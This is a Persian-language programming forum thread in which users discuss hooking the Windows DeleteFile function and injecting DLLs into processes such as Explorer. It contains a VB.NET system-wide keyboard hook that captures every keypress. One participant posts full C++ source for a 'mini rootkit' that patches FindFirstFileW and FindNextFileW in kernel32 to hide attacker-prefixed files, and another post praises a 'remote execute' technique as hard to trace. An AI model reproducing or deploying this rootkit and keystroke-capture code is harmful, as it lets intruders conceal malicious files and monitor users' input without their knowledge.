رونویسی یک فانکشن در kernel32 - اینجکتشن

[amin_vb]

شما برای کاری که میخواهید انجام بدین باید تابع deletefile رو هوک کنید اون پروگرس بار رو explorer نشون میده و برای حذف هر فایل از تابع deleteFile استفاده میکنه هر وقت کاربر بخواهد فایلی رو حذف کنه ادرس اون فایل به عنوان پارامتر به تابع DeleteFile ارسال میشه وقتی شما این تابع رو هوک میکنین تابع شما قبل از تابع اصلی اطلاعات رو دریافت میکنه و پردازش میکنه و در صورت تایید تابع شما تابع اصلی DeleteFile رو فراخوانی میکنه

ببینید بزارین یه مثالی اینجا بزارم :

کد php:

Public Class KeyboardHook
    ''Constants
    Private Const HC_ACTION As Integer = 0
    Private Const WH_KEYBOARD_LL As Integer = 13
    Private Const WM_KEYDOWN = &H100
    Private Const WM_KEYUP = &H101
    Private Const WM_SYSKEYDOWN = &H104
    Private Const WM_SYSKEYUP = &H105

    ''Keypress Structure
    Private Structure KBDLLHOOKSTRUCT
        Public vkCode As Integer
        Public scancode As Integer
        Public flags As Integer
        Public time As Integer
        Public dwExtraInfo As Integer
    End Structure
    ''API Functions
    Private Declare Function SetWindowsHookEx Lib "user32" _
    Alias "SetWindowsHookExA" _
    (ByVal idHook As Integer, _
    ByVal lpfn As KeyboardProcDelegate, _
    ByVal hmod As Integer, _
    ByVal dwThreadId As Integer) As Integer

    Private Declare Function CallNextHookEx Lib "user32" _
    (ByVal hHook As Integer, _
    ByVal nCode As Integer, _
    ByVal wParam As Integer, _
    ByVal lParam As KBDLLHOOKSTRUCT) As Integer

    Private Declare Function UnhookWindowsHookEx Lib "user32" _
    (ByVal hHook As Integer) As Integer

    ''Our Keyboard Delegate
    Private Delegate Function KeyboardProcDelegate _
    (ByVal nCode As Integer, _
    ByVal wParam As Integer, _
    ByRef lParam As KBDLLHOOKSTRUCT) As Integer

    ''The KeyPress events
    Public Shared Event KeyDown(ByVal Key As Keys)
    Public Shared Event KeyUp(ByVal Key As Keys)
    ''The identifyer for our KeyHook
    Private Shared KeyHook As Integer
    ''KeyHookDelegate
    Private Shared KeyHookDelegate As KeyboardProcDelegate

    Public Sub New()
        ''Installs a Low Level Keyboard Hook
        KeyHookDelegate = New KeyboardProcDelegate(AddressOf KeyboardProc)
        KeyHook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyHookDelegate, System.Runtime.InteropServices.Marshal.GetHINSTANCE(System.Reflection.Assembly.GetExecutingAssembly.GetModules()(0)).ToInt32, 0)
    End Sub

    Private Shared Function KeyboardProc(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer
        ''If it is a keypress
        If (nCode = HC_ACTION) Then
            Select Case wParam
                ''If it is a Keydown Event
                Case WM_KEYDOWN, WM_SYSKEYDOWN
                    ''Activates the KeyDown event in Form 1
                    RaiseEvent KeyDown(CType(lParam.vkCode, Keys))
                Case WM_KEYUP, WM_SYSKEYUP
                    ''Activates the KeyUp event in Form 1
                    RaiseEvent KeyUp(CType(lParam.vkCode, Keys))
            End Select
        End If
        ''Next
        Return CallNextHookEx(KeyHook, nCode, wParam, lParam)
    End Function

    Protected Overrides Sub Finalize()
        ''On close it UnHooks the Hook
        UnhookWindowsHookEx(KeyHook)
        MyBase.Finalize()
    End Sub
End Class 


کد php:

Public Class Form1
    Private WithEvents kbHook As New KeyboardHook
    Private Sub kbHook_KeyDown(ByVal Key As System.Windows.Forms.Keys) Handles kbHook.KeyDown
        TextBox1.Text = TextBox1.Text + Key.ToString + " KeyDown" + vbNewLine
    End Sub

    Private Sub kbHook_KeyUp(ByVal Key As System.Windows.Forms.Keys) Handles kbHook.KeyUp
        TextBox1.Text = TextBox1.Text + Key.ToString + " KeyUp" + vbNewLine
    End Sub


End Class 


این مثال بالا کیبرد رو داره هوک می کنه .
حالا فرض کنید مثل اون موردی که برای دیلیت کردن گفتم (بعضی فایلها دیلیت کردنشون کنسل بشه بعضیا دیلیت بشن) بخایم عمل کنیم . اینجا راحت می تونیم یه سری از کلیدهای کیبرد رو فیلتر کنیم . برای این کار کافیه کد هر کلید رو بررسی کنیم و اگه خواستیم اونو فیلتر کنیم . به این صورت تابع KeyboardProc رو تغییر میدیم :

کد php:

Private Shared Function KeyboardProc(ByVal nCode As Integer, ByVal wParam As Integer, ByRef lParam As KBDLLHOOKSTRUCT) As Integer
        ''If it is a keypress
        If (nCode = HC_ACTION) Then
            Select Case wParam
                ''If it is a Keydown Event
                Case WM_KEYDOWN, WM_SYSKEYDOWN
                    ''Activates the KeyDown event in Form 1
                    RaiseEvent KeyDown(CType(lParam.vkCode, Keys))
                Case WM_KEYUP, WM_SYSKEYUP
                    ''Activates the KeyUp event in Form 1
                    RaiseEvent KeyUp(CType(lParam.vkCode, Keys))
            End Select
        End If
        ''Next
        If CType(lParam.vkCode, Keys) = Keys.A Then
            Return 1
        Else
            Return CallNextHookEx(KeyHook, nCode, wParam, lParam)
        End If
   
    End Function 


خوب این خیلی سادست ! به همین راحتی کلید A رو از صفحه کلید اجازه عبور نمی دیم بهش ! اما بقیه کلید ها رو می ذاریم عبور کنن . یعنی عملا توی هوکمون فیلتر گذاشتیم . این کار نه نوشتن dll لازم داره و نه اینجکت کردن و نه تغییر تیبل و ... . و در سطح کل سیستم هم جواب می ده . حالا مابه این سناریو رو دقیقا می خام برای تابع delete پیاده سازی کنم . ! و دقیقا مشابه همین هم فیلتر کنم . پس نباید به اینجکت و نوشتن dll احتیاج باشه . آره ؟

[joker]

خوب این خیلی سادست ! به همین راحتی کلید A رو از صفحه کلید اجازه عبور نمی دیم بهش ! اما بقیه کلید ها رو می ذاریم عبور کنن . یعنی عملا توی هوکمون فیلتر گذاشتیم . این کار نه نوشتن dll لازم داره و نه اینجکت کردن و نه تغییر تیبل و ... . و در سطح کل سیستم هم جواب می ده . حالا مابه این سناریو رو دقیقا می خام برای تابع delete پیاده سازی کنم . ! و دقیقا مشابه همین هم فیلتر کنم . پس نباید به اینجکت و نوشتن dll احتیاج باشه . آره ؟

اگه dll ش نکنی و به تمام پروسه ها تزریق نکنی این کار فقط در سطح برنامه ای که نوشتی انجام پذیر میشه ،

[amin_vb]

خوب این خیلی سادست ! به همین راحتی کلید A رو از صفحه کلید اجازه عبور نمی دیم بهش ! اما بقیه کلید ها رو می ذاریم عبور کنن . یعنی عملا توی هوکمون فیلتر گذاشتیم . این کار نه نوشتن dll لازم داره و نه اینجکت کردن و نه تغییر تیبل و ... . و در سطح کل سیستم هم جواب می ده . حالا مابه این سناریو رو دقیقا می خام برای تابع delete پیاده سازی کنم . ! و دقیقا مشابه همین هم فیلتر کنم . پس نباید به اینجکت و نوشتن dll احتیاج باشه . آره ؟

اگه dll ش نکنی و به تمام پروسه ها تزریق نکنی این کار فقط در سطح برنامه ای که نوشتی انجام پذیر میشه ،

اون مثال کیبرد رو برای همین زدم دیگه ! اونو که dll نکردم ! فقط تا زمانی که برنامه من در ال اجرا باشه (حتی به صورت مخفی در بکگراند مثلا) در تمام برنامه های دیگه اون هوک انجام می گیره ! یعنی شما در هیچ برنامه ای نمی تونین کلید A رو ارسال کنین . بدون نوشتن dll و اینجکت بوده !

[joker]

خب به سلامتی دیگه :)

deletefile هم فقط یک ورودی داره که استرینگ هست و پردازش متن برای چک کردن اسم فایلی که برای حذف بهش اومده تمومه :)

[amin_vb]

متاسفانه هر کاری کردم موفق نشدم اون هوک لعنتی رو بنویسم !
کسی نیست که تجربه ای در این زمینه داشته باشه و بگه چطور بنویسم اونو ؟ :(
یا یه نمونه کوچیک بزاره که مثلا دیلیت کردن ها رو کنسل کنه ؟ یا یه در میون کنسل کنه ؟
:(

[lord_viper]

شما نظرتون در مورد هوک اشتباس
2 نوع هوک تو ویندوز داریم
1 هوکی که توسط توابع api و ویندوز پیاده سازی میشه که محدود به هوک های زیر می باشد

کد:

CallMsgFilter
CallNextHookEx
CallWndProc
CallWndRetProc
CBTProc
DebugProc
ForegroundIdleProc
GetMsgProc
JournalPlaybackProc
JournalRecordProc
KeyboardProc
MessageProc
MouseProc
SetWindowsHookEx
ShellProc
SysMsgProc
UnhookWindowsHookEx

hookapi با هوکی که داخل ویندوز هست کاملا متفاوته
هوک خاصی برای کاری که شما میخواهید انجام بدین وجود نداره پس بیخودی به هوک کیبورد که توسط خود ویندوز و توابع api مدیریت میشه نچسب

این یه مینی روتکیت هست که با هوک findFirstFileW و FineNextFileW فایلهای مورد نظر مهاجم رو در explorer مخفی میکنه

کد:

// Example of a little rootkit
// E0N (L) 2007

#include <windows.h>
#include <iostream>


// DECLARACIONES:
BYTE *BufferFF;                 // Buffer to  use original FindFirstFileW
BYTE *BufferFN;                 // Buffer to use original FindNextFileW
char Prefijo[] = "miniRoot_";   // prefix for hide files


// FUNCIONES:
void    Hookear();  // Función que hookeará el api

// Función que será llamada en vez de FindFirstFileW
HANDLE  __stdcall miFindFirstFileW(LPCTSTR lpFileName,LPWIN32_FIND_DATAW lpFindFileData);
// Puntero a función con el cual llamaremos al api FindFirstFileW original
HANDLE (__stdcall *pBuffFF) (LPCTSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData);

// Función que será llamada en vez de FindNextFileW
HANDLE  __stdcall miFindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATAW lpFindFileData);
// Puntero a función con el cual llamaremos al api FindNextFileW original
HANDLE (__stdcall *pBuffFN) (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData);





// FUNCIÓN MAIN
bool WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
// Si cargan la DLL hookeamos
if (fdwReason == DLL_PROCESS_ATTACH)
{
MessageBox (0, "CARGADA!!!!!", "", 0);
Hookear();
}
return TRUE;
}



// FUNCIÓN QUE LLAMARÁ EL PROGRAMA PRINCIPAL CREYENDO QUE ES EL API FINDFIRSTFILEW
HANDLE  __stdcall miFindFirstFileW(LPCTSTR lpFileName,LPWIN32_FIND_DATAW lpFindFileData)
{
// No hacemos nada en especial

HANDLE hand = pBuffFF(lpFileName,lpFindFileData);
return hand;
}


// FUNCIÓN QUE LLAMARÁ EL PROGRAMA PRINCIPLA CREYENDO QUE ES EL API FINDNEXTFILEW
HANDLE  __stdcall miFindNextFileW(HANDLE hFindFile,LPWIN32_FIND_DATAW lpFindFileData)
{
// Ocultamos los archivos que empiecen por el prefijo indicado

HANDLE hand;
char ascStr[611];

do
{
hand = pBuffFN(hFindFile,lpFindFileData);
WideCharToMultiByte(CP_ACP, 0, lpFindFileData->cFileName, -1, ascStr, 611, NULL, NULL);

}while (strncmp(ascStr,Prefijo,strlen(Prefijo)) == 0 && hand != NULL);

return hand;
}


// FUNCIÓN PARA HOOKEAR FINDNEXTFILEW Y FINDFIRSTFILEW
void Hookear()
{
DWORD ProteVieja;  // Parametro para VirtualProtect

BYTE  *DirFN;      // La dirección en memoria de FindNextFileW
BYTE  *DirYoFN;    // La dirección en memoria de la función que replaza a FindNextFileW

BYTE  *DirFF;      // La dirección en memoria de FindFirstFileW
BYTE  *DirYoFF;    // La dirección en memoria de la función que replaza a FindFirstFileW


// --> HOOKEAMOS FINDFIRSTFILEW (7 bytes)


// Obtenemos la dirección en memoria de FindNextFileW
DirFF=(BYTE *) GetProcAddress(GetModuleHandle("kernel32.dll"), "FindFirstFileW");

// Reservamos 12 bytes de memoria para nuestro Buffer
BufferFF=(BYTE *) malloc (12);

//Le damos todos los permisos a los 12 bytes de nuestro Buffer
VirtualProtect((void *) BufferFF, 12, PAGE_EXECUTE_READWRITE, &ProteVieja);

// Copiamos los 7 primeros bytes del api en el buffer
memcpy(BufferFF,DirFF,7);
BufferFF += 7;

// En los 5 bytes restantes...
// En el primero introducimos un jmp
*BufferFF=0xE9;
BufferFF++;

// En los otros 4 la distancia del salto
*((signed int *) BufferFF)= DirFF - BufferFF + 3;

// Asignamos al puntero a funcion pBuff el inicio del Buffer para poder ejecutar el api original
pBuffFF = (HANDLE (__stdcall *)(LPCTSTR,LPWIN32_FIND_DATAW)) (BufferFF-8);


// Le damos todos los permisos a los 5 primeros bytes de la api original
VirtualProtect((void *) DirFF,5,PAGE_EXECUTE_READWRITE,&ProteVieja);

// Cambiamos el tipo a puntero a byte para facilitar el trabajo
DirYoFF=(BYTE *) miFindFirstFileW;

// En el inicio de la api metemos un jmp para que salte a miFindNextFileW
*DirFF=0xE9;
DirFF++;

// Metemos la distancia del salto
*((signed int *) DirFF)=DirYoFF - DirFF - 4;



// --> HOOKEAMOS FINDNEXTFILEW (7 bytes)


// Obtenemos la dirección en memoria de FindNextFileW
DirFN=(BYTE *) GetProcAddress(GetModuleHandle("kernel32.dll"), "FindNextFileW");

// Reservamos 12 bytes de memoria para nuestro Buffer
BufferFN=(BYTE *) malloc (12);

//Le damos todos los permisos a los 12 bytes de nuestro Buffer
VirtualProtect((void *) BufferFN, 12, PAGE_EXECUTE_READWRITE, &ProteVieja);

// Copiamos los 7 primeros bytes del api en el buffer
memcpy(BufferFN,DirFN,7);
BufferFN += 7;

// En los 5 bytes restantes...
// En el primero introducimos un jmp
*BufferFN=0xE9;
BufferFN++;

// En los otros 4 la distancia del salto
*((signed int *) BufferFN)= DirFN - BufferFN + 3;

// Asignamos al puntero a funcion pBuff el inicio del Buffer para poder ejecutar el api original
pBuffFN = (HANDLE (__stdcall *)(HANDLE,LPWIN32_FIND_DATAW)) (BufferFN-8);


// Le damos todos los permisos a los 5 primeros bytes de la api original
VirtualProtect((void *) DirFN,5,PAGE_EXECUTE_READWRITE,&ProteVieja);

// Cambiamos el tipo a puntero a byte para facilitar el trabajo
DirYoFN=(BYTE *) miFindNextFileW;

// En el inicio de la api metemos un jmp para que salte a miFindNextFileW
*DirFN=0xE9;
DirFN++;

// Metemos la distancia del salto
*((signed int *) DirFN)=DirYoFN - DirFN - 4;

// Libermos librerias de cache
FlushInstructionCache(GetCurrentProcess(),NULL,NULL);
}

شما در کل این کد هیچ تابعی مثل SetWindowsHookEx یا CallNextHookEx و .... پیدا نمیکنید

[joker]

متاسفانه هر کاری کردم موفق نشدم اون هوک لعنتی رو بنویسم !
کسی نیست که تجربه ای در این زمینه داشته باشه و بگه چطور بنویسم اونو ؟ :(
یا یه نمونه کوچیک بزاره که مثلا دیلیت کردن ها رو کنسل کنه ؟ یا یه در میون کنسل کنه ؟
:(

شما این یکبارو به حرف من گوش کن ، dllش کن ، به تمام پروسه ها ( یا در این مورد خاص اکسپلورر) اینجکتش کن میشه

[lord_viper]

برای هوک کردن تابع شما باید درون فضای ادرسی پروسه یا پروسه های هدف باشه برای این کار حداقل 2 راه عمومی وجود داره
1.خودت اینجکت کنی
2.از تابع SetWindowsHookEx در قالب یک GlobalHook استفاده کنی( همون طور که joker عزیز گفت)
یعنی یه dll بنویسی که مثلا یک MessageHook سوری باشه و در انتها هوک خودت وجود داشته باشه با اجرای اون خود ویندوز dll ت رو به تمامی پروسه هایی که از user32 استفاده میکنن inject میکنه

اگه نخواهی از dll استفاده کنی باید از تکنیک Remoute execute استفاده کنی

[amin_vb]

خوب پس چندتا سوال برام پیش اومده :
اول اینکه این ریمون اگزکیوت چیه ؟ مزایا و معایبش چیه نسبت به این روش ؟

دوم اینکه : فرض کنید قراره dll بنویسیم و اینجکت کنیم . این dll رو با ویژوال بیسیک بنویسیم ؟ مشکل تایپ ها به وجود نمیاد ؟ از چه لینکری بارش استفاده کنم ؟ لینکر خود ویژوال بیسیک ؟
یعنی مثلا یک پروژه جدید اکتیوکس دی ال ال باز کنم و توش یه ماژول ایجاد کنم ( و نه کلاس؟) و بعد این کدو بزارم توش و بعد معمولی اونو کامپایل کنم ؟ (با لینکر خودش)

Public Function DeleteFileA(path As String) As Boolean
DeleteFileA = False
End Function

همین جوری ؟ ! بعد این dll امادس که اینجکت بشه و جای deletefileA رو بگیره ؟ یا جه تمهیدات دیگه ای باید درنظر گرفت براش ؟

[lord_viper]

خوب پس چندتا سوال برام پیش اومده :
اول اینکه این ریمون اگزکیوت چیه ؟ مزایا و معایبش چیه نسبت به این روش ?

مزایاش اینه که ردیابیش خیلی سخته و نیاز به فایلهای جانبی مثل dll هم نداری
معایبش این هست که پیاده سازیش سخته
اگه توابعی که بکاربردی تو برنامه اصلی نباشه ارور میده

دوم اینکه : فرض کنید قراره dll بنویسیم و اینجکت کنیم . این dll رو با ویژوال بیسیک بنویسیم ؟

visual basic؟ اومدی نسازیا dll ی که مینویسی باید standard باشه

مشکل تایپ ها به وجود نمیاد ؟ از چه لینکری بارش استفاده کنم ؟ لینکر خود ویژوال بیسیک ؟

هیچ مشکلی به وجود نمیاد ویندوز خودش میدونه چطوری با اینها برخورد کنه

یعنی مثلا یک پروژه جدید اکتیوکس دی ال ال باز کنم و توش یه ماژول ایجاد کنم ( و نه کلاس؟) و بعد این کدو بزارم توش و بعد معمولی اونو کامپایل کنم ؟ (با لینکر خودش)

Public Function DeleteFileA(path As String) As Boolean
DeleteFileA = False
End Function

همین جوری ؟ ! بعد این dll امادس که اینجکت بشه و جای deletefileA رو بگیره ؟ یا جه تمهیدات دیگه ای باید درنظر گرفت براش ؟

اون نمونه مثالی که زدم رو دیدی؟
خب اگه از این کد استفاده کنی و هر پروسه ای رو هوک کنی به طور کل حذف فایل درش غیر فعال میشه

نوشتن dll و inject اون به پروسه هدف فقط نصف کار هست و اصل کار از اونجا به بعد شروع میشه یعنی رونویسی IAT مربوط به DeleteFile

[amin_vb]

ممنون
//
سوال : حالا توی این روش من همون dll رو اینجکت کنم از این به بعد موقع دیلیت کردن فایل ها اون تابع فراخونی میشه ! اما همچنان اون پروگرس بار خود ویندوز/اکسپلورر نمایش داده میشه که ! اگه بخام مثلا پروگرس بار رو عوض کنم و یا اینکه مثلا در حین دیلیت کردن ها مسیج باکس هم بدم باید چه کنم ؟ توی dll که نمیشه از اینا استفاده کرد دیگه (مسیج باکس/دی ال ال) . درست می گم ؟ راه حلش چیه ؟